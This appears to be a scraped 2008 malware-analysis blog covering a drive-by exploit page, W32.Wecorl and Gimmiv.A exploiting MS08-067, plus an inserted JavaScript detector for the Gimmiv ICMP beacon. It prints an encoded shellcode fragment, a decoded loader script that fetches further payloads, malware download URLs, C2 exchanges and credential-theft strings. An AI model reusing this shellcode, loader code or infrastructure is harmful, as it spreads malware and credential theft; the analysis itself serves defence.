%u4c6c%u414b%u736c%u4135%u6368%u6a31%u6c4f%u524b%u766f%u6c78%u414b%u674f%u6450%u6841%u726b
%u6e69%u546b%u6c74%u374b%u5871%u706e%u6b31%u6e70%u4e79%u4b4c%u3934%u7350%u5744%u6f77%u6931
%u565a%u776d%u6871%u3842%u396b%u4564%u416b%u4444%u6364%u5434%u4935%u6e75%u636b%u416f%u3534
%u7a51%u514b%u6e76%u346b%u304c%u6e4b%u416b%u754f%u354c%u6a51%u6e4b%u476b%u6e6c%u436b%u7a31
%u4c4b%u7349%u516c%u5634%u4b64%u3073%u4f31%u5230%u4e44%u736b%u4470%u4c70%u5945%u4150%u3468
%u4c4c%u634b%u4670%u4c6c%u524b%u5750%u6e6c%u6c4d%u504b%u3768%u6a78%u574b%u6c79%u6b4b%u4e30
%u7750%u7770%u4370%u6c30%u754b%u5738%u614c%u544f%u7871%u5376%u5650%u6c36%u7949%u4e68%u6b63
%u5170%u566b%u3230%u6c48%u4d30%u675a%u4374%u356f%u4f38%u7968%u4d6e%u765a%u706e%u4b57%u4d4f
%u7237%u344d%u7333%u5258%u5054%u5761%u4150%u7278%u6354%u4244%u6450%u767a%u364f%u624f%u5341
%u3154%u4368%u7054%u316e%u3175%u7464%u326e%u524e%u7345%u6444%u426f%u7043%u706f%u3564%u3435
%u516f%u3263%u4352%u7045%u646e%u346e%u3530%u5438%u7530%u6550");

var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < …….truncated…….

[Lost when the page was captured; surviving fragments, in order: fblk = bgbl.substring(0,slspc); blk = bgbl.substring(0,bgbl.length …; blk = blk …; mmy = new …; i = 0; nm = 12; i = 0; nm = nm …; i = 0; nm = nm …]

The shellcode execution results in a GET request for hxxp://adxdnet.net/code/srun.php. The domain adxdnet.net is hosted at 85.17.162.100 (same IP as infonews.ath.cx).

The adxdnet.net/code/srun.php request returns obfuscated JavaScript. The image reference for hxxp://fc.webmasterpro.de/as_noscript.php?name=load3 is for tracking purposes.

The decoded script reveals a redirect to adxdnet.net/code/srun.php?req

var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }

if(xobj) {
xobj.open("GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun");
xobj.send(null);
response = xobj.responseText;
}

if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}

The adxdnet.net/code/srun.php?req request returns content for additional binary downloads.

GET /code/srun.php?req HTTP/1.1
request: srun
Referer: http://adxdnet.net/code/srun.php
Host: adxdnet.net

Six minutes later, a GET request for ssa.adxdnet.net/get.php?src=xpre occurred. Additional hex-encoded binaries were downloaded over an 8 minute period. Notice the User-Agent (WinHttp.WinHttpRequest.5) and the Request: srun header.

GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)
Host: ssa.adxdnet.net

hxxp://ssa.adxdnet.net/get.php?src=xpre
hxxp://ssa.adxdnet.net/get.php?src=prun
hxxp://ssa.adxdnet.net/get.php?src=wavvsnet
hxxp://ssa.adxdnet.net/get.php?src=snapsnet
hxxp://ssa.adxdnet.net/get.php?src=rasesnet
hxxp://ssa.adxdnet.net/get.php?src=searsnet
hxxp://ssa.adxdnet.net/get.php?src=incasnet
hxxp://ssa.adxdnet.net/get.php?src=winvsnet

The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.

GET /code/const.php HTTP/1.1
Host: ssa.adxdnet.net

The downloaded malware installs a variety of crapware (rogue security products, adware, etc.).

Filename       MD5                                Size (Bytes)
data.pdf       84bc91579cd4dbee7faf3ee09c4a9a4b   10179
prun.exe       d7512e025c439d8454a742992229770c   34816
rasesnet.exe   423d4daf5374710d4498ed917f44b92a   135168
searsnet.exe   18bd892d291f21f14e660537112bb81c   65024
snapsnet.exe   637146739c0dc4c078e0654e6d77eda1   112378
wavvsnet.exe   602b54e018fe9b226ebf8fd5ebaff09c   40014
winvsnet.exe   279ce5af3638a2ba1fde073bbe73a0c5   54784
xpre.exe       1d032fbc6d6884903fa92889f99fc180   745472

Sunday, November 9, 2008

MS08-067 and W32.Wecorl

On 2 November 2008, Symantec reported a “worm” called W32.Wecorl that attempted to exploit the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067). The following provides analysis for the W32.Wecorl malware variant 10wrjcenew.exe.

In a lab test, the malware 10wrjcenew.exe:

Created C:\DOCUME~1\%user profile%\LOCALS~1\Temp\Install.2008.dat
Deleted C:\WINDOWS\System32\Dllcache\Svchost.exe
Modified C:\WINDOWS\System32\Svchost.exe
Created C:\WINDOWS\system32\7DBF6DA4

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Google "[MAC ADDRESS]"
Type: REG_BINARY
Data: (data too large: 3584 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Licenses "[MAC ADDRESS]"
Type: REG_BINARY
Data: [HEXADECIMAL DATA]

The malware proceeded to download mimi.1268772 from ls.cc86.info (121.12.172.44, CN) and pp.gif from blog-imgs-27.fc2.com (208.71.107.52, US).

GET /mimi.1268772 HTTP/1.1
Host: ls.cc86.info

GET /u/f/o/ufo2000sgd/pp.gif HTTP/1.1
Host: blog-imgs-27.fc2.com

The malware attempted an MS08-067 buffer overflow exploit against 121.x.x.x UDP port 137.

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..

The malware connects to ce.10wrj.com (218.95.101.68, CN) ClientReg.aspx and ClientTask.aspx to register the malware and receive C2 instructions. The sample connection shows a download request for ce.10wrj.com/nb1103.exe.

GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign xxyyMyIP=xx.xx.xx.xx



GET /ClientTask.aspx?mac= xx:xx:xx:xx:xx:xx &Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign
xxyyUserNamePassWord=CeUser:CePassWord
xxyyPort=0
xxyyUpdata=http://ce.10wrj.com/nb1103.exe*
xxyyRemoteHost=

The following files were observed during analysis:

10752 f01fd7ecfce8af65832a3a57d2789fa6 10wrjcenew.exe
12800 0f7d9c87b0ce1fa520473119752c6f79 3EDFB6D2
900 14c9db2b8177ca199f283e644fcda225 mimi.1268772
404992 0fdb364e8666140d4570d24f363d26d5 nb1103.exe
258048 944b1a83ee17db7fa779a2e7d970768c pp.gif

Thursday, November 6, 2008

MS08-067 and Trojan.Gimmiv.A

On 24 October 2008, Microsoft released an out-of-cycle patch that addressed a stack buffer overflow vulnerability in the Microsoft Windows Server service (MS08-067, CVE-2008-4250). Per Microsoft, "This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit."

Public exploit code and malware began circulating as soon as the patch was released. Microsoft and Symantec provided analysis on malware known as Gimmiv.A. The malware harvests and exfiltrates system information and is able to scan and exploit the MS08-067 vulnerability. The following provides analysis findings for Gimmiv.A.

Site 59.106.145.58 (JP) was found to host nine Gimmiv.A binaries, n1.exe through n9.exe.

http[:]// 59.106.145.58/n*.exe

dc3fdfde66fffb6cfbec946a237787d8 397312 59.106.145.58/n1.exe
f173007fbd8e2190af3be7837acd70a4 397312 59.106.145.58/n2.exe
3ee354cc8b63b8849b28e6f376f2b263 397312 59.106.145.58/n3.exe
6c3e53864541bb13fa7853f7b580b807 397312 59.106.145.58/n4.exe
24cd978da62cff8370b83c26e134ff4c 397312 59.106.145.58/n5.exe
86d75ae361637a8f9114bb3a40f710d3 397312 59.106.145.58/n6.exe
ee70f981514803e1fb4e6b65f492a56d 397312 59.106.145.58/n7.exe
8d66f28d028a4838d09ce4b91d35b7cb 397312 59.106.145.58/n8.exe
477aac8d472a7bea8b906718a2f50c67 397312 59.106.145.58/n9.exe

The malware n2.exe was analyzed as an example.

n2.exe creates c:\WINDOWS\system32\wbem\sysmgr.dll

sysmgr.dll
1cdc67b1d55e9a2d30c0dba193375c11
336384 bytes

The following registry keys are created to install the malware as a service.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
"sysmgr" = sysmgr
"DisplayName" = System Maintenance Service
"ErrorControl" = 0
"ImagePath" = %SystemRoot%\System32\svchost.exe -k sysmgr
"ObjectName" = LocalSystem
"Start" = 2
"Type" = 10, 01, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Enum

"0" = Root\LEGACY_SYSMGR\0000
"Count" = 1
"NextInstance" = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Parameters
"ServiceDll" = C:\WINDOWS\System32\wbem\sysmgr.dll
"ServiceMain" = ServiceMainFunc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Security
"Security" = binary data

The malware searches the registry for the presence of installed antivirus programs and active processes for avp.exe and dwm.exe.

0002549C 1002549C 0 SOFTWARE\BitDefender
000254B4 100254B4 0 avp.exe
000254BC 100254BC 0 SOFTWARE\Jiangmin
000254D8 100254D8 0 SOFTWARE\KasperskyLab
000254F0 100254F0 0 SOFTWARE\Kingsoft
00025504 10025504 0 SOFTWARE\Symantec\PatchInst\NIS
00025524 10025524 0 SOFTWARE\Microsoft\OneCare Protection
0002554C 1002554C 0 SOFTWARE\rising
0002555C 1002555C 0 SOFTWARE\TrendMicro
00025574 10025574 0 dwm.exe

The malware sysmgr.dll sends ICMP Echo requests to 202.108.22.44 and 64.233.189.147. An Echo reply was returned from 64.233.189.147.

Source Destination Protocol Info
192.168.0.13 202.108.22.44 ICMP Echo (ping) request
192.168.0.13 64.233.189.147 ICMP Echo (ping) request
64.233.189.147 192.168.0.13 ICMP Echo (ping) reply

The ICMP packet contains a string of characters abcde12345fghij6789.

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 30 00 81 00 00 80 01 98 fe c0 a8 00 0d ca 6c .0.............l
0020 16 2c 08 00 ba 5f 02 00 02 00 61 62 63 64 65 31 .,..._....abcde1
0030 32 33 34 35 66 67 68 69 6a 36 37 38 39 00 23 45 fghij6789.
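As an added example (not from the original post), the JavaScript below rebuilds the frame from a text hex dump of the kind shown above, decodes the Ethernet, IPv4 and ICMP headers, and flags an Echo request whose payload carries the abcde12345fghij6789 marker; the NetBIOS dump from the W32.Wecorl post serves as the negative case because it is UDP, not ICMP. The function names are assumptions.

```javascript
// Added example, not from the original post: parse a text hex dump, walk
// Ethernet -> IPv4 -> ICMP and check the Echo payload for the Gimmiv.A marker.
const GIMMIV_MARKER = 'abcde12345fghij6789';

// Parse "OFFSET  b0 b1 ... b15  ascii" rows into one Buffer. The ASCII column is
// ignored: it is a lossy rendering of the same bytes and stops the row parse.
function parseHexDump(text) {
  const bytes = [];
  for (const line of text.split('\n')) {
    const tok = line.trim().split(/\s+/);
    if (tok.length < 2 || !/^[0-9a-f]{4}$/i.test(tok[0])) continue;
    for (let i = 1; i < tok.length && i <= 16; i++) {
      if (!/^[0-9a-f]{2}$/i.test(tok[i])) break; // first ASCII-column token ends the row
      bytes.push(parseInt(tok[i], 16));
    }
  }
  return Buffer.from(bytes);
}

// Minimal decoder: returns null unless the frame is IPv4 carrying ICMP.
function decodeIcmp(frame) {
  if (frame.length < 34 || frame.readUInt16BE(12) !== 0x0800) return null; // not IPv4
  const ipStart = 14;
  const ihl = (frame[ipStart] & 0x0f) * 4;
  const totalLen = frame.readUInt16BE(ipStart + 2);
  if (frame[ipStart + 9] !== 1) return null; // IP protocol 1 = ICMP
  const icmpStart = ipStart + ihl;
  const end = Math.min(frame.length, ipStart + totalLen); // drop Ethernet trailer bytes
  return {
    src: Array.from(frame.subarray(ipStart + 12, ipStart + 16)).join('.'),
    dst: Array.from(frame.subarray(ipStart + 16, ipStart + 20)).join('.'),
    type: frame[icmpStart],
    code: frame[icmpStart + 1],
    payload: frame.subarray(icmpStart + 8, end),
  };
}

// Detection: an Echo request (type 8) whose payload carries the marker string.
function isGimmivBeacon(frame) {
  const icmp = decodeIcmp(frame);
  if (!icmp || icmp.type !== 8) return false;
  return icmp.payload.toString('latin1').includes(GIMMIV_MARKER);
}

// The ICMP dump from the post, reproduced as constructed test input
const SAMPLE_ICMP_DUMP = `
0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 30 00 81 00 00 80 01 98 fe c0 a8 00 0d ca 6c .0.............l
0020 16 2c 08 00 ba 5f 02 00 02 00 61 62 63 64 65 31 .,..._....abcde1
0030 32 33 34 35 66 67 68 69 6a 36 37 38 39 00 23 45 fghij6789.
`;

// The NetBIOS (UDP) dump from the W32.Wecorl post, used as the negative case
const SAMPLE_UDP_DUMP = `
0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..
`;

const icmp = decodeIcmp(parseHexDump(SAMPLE_ICMP_DUMP));
console.log(`${icmp.src} -> ${icmp.dst} ICMP type ${icmp.type} payload "${icmp.payload.toString('latin1')}"`);
console.log('Gimmiv beacon:', isGimmivBeacon(parseHexDump(SAMPLE_ICMP_DUMP)));
```

Trimming the payload to the IP total length matters here: the dump carries two bytes (23 45) past the end of the datagram, and without the trim they would be reported as part of the beacon.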

The binary strings of sysmgr.dll reveal the ICMP string and a third IP, 212.227.93.146.

00039018 00439018 0 abcde12345fghij6789
00039030 00439030 0 212.227.93.146
00039070 00439070 0 64.233.189.147
00039090 00439090 0 202.108.22.44

202.108.22.44 (CN)
Reverse lookup xd-22-44-a8.bta.net.cn

64.233.189.147 (US)
Reverse lookup hk-in-f147.google.com

212.227.93.146 (DE)
Reverse lookup s167748465.websitehome.co.uk

The malware captures host information (IP address, hostname) and credentials stored by Outlook Express and Protected Storage.

00025E04 10025E04 0 Username
00025E10 10025E10 0 82BD0E67-9FEA-4748-8672-D5EFE5B779B0
00025E38 10025E38 0 Advapi32.dll
00025E48 10025E48 0 CredEnumerate
00025E58 10025E58 0 CredFree
00025E64 10025E64 0 Passport.Net\*
00025E74 10025E74 0 pstorec.dll
00025E80 10025E80 0 PStoreCreateInstance
00025E9C 10025E9C 0 89c39569
00025EA8 10025EA8 0 5e7e8100
00025EB4 10025EB4 0 e161255a
00025EC8 10025EC8 0 StringIndex
00025ED4 10025ED4 0 :String
00025EDC 10025EDC 0 :String
00025EE4 10025EE4 0 http:/
00025EEC 10025EEC 0 https:/
00025EF8 10025EF8 0 ===============Outlook Express===============
00025F28 10025F28 0 ===============Credential Info================
00025F58 10025F58 0 ============Protected Storage Info=============
00025F94 10025F94 0 Pass:
00025F9C 10025F9C 0 URL:
00025FA8 10025FA8 0 GetWebInfo
00025FB4 10025FB4 0 <%s %d> !!! Web ID/Pass Info ERR
00025FE7 10025FE7 0 ksysmgr

The malware exfiltrates the captured information to 59.106.145.58/test2.php?abc=[num]?def=[num]. The abc value represents the installed antivirus version and the def value represents the OS version. The exfiltrated data is protected with AES encryption.

00025638 10025638 0 ?abc=1
00025648 10025648 0 ?abc=3
00025658 10025658 0 ?abc=4
00025668 10025668 0 ?abc=5
00025678 10025678 0 ?abc=6
00025688 10025688 0 ?abc=7
00025698 10025698 0 ?abc=8
000256A8 100256A8 0 ?abc=9
000256B8 100256B8 0 ?abc=2
000256C8 100256C8 0 ?def=2
000256D8 100256D8 0 ?def=3
000256E8 100256E8 0 ?def=1
000256F8 100256F8 0 ?def=4
00025708 10025708 0 ?def=5

Gimmiv.A attempts to connect to the remote IP address 59.106.145.58 to download a CAB file to %System%\initproc02x.cab. From the CAB file, the trojan extracts the following files:

winbase.dll
basesvc.dll
syicon.dll

311296 82ba009746da8603c463f37e381a42a4 basesvc.dll
200704 60d692fd52098f145e448bd985fcff6d syicon.dll
49152 40cb861ad59c804f340fd8a2a28e226c winbase.dll

The additional dlls provide the functionality of scanning and exploiting the MS08-067 vulnerability.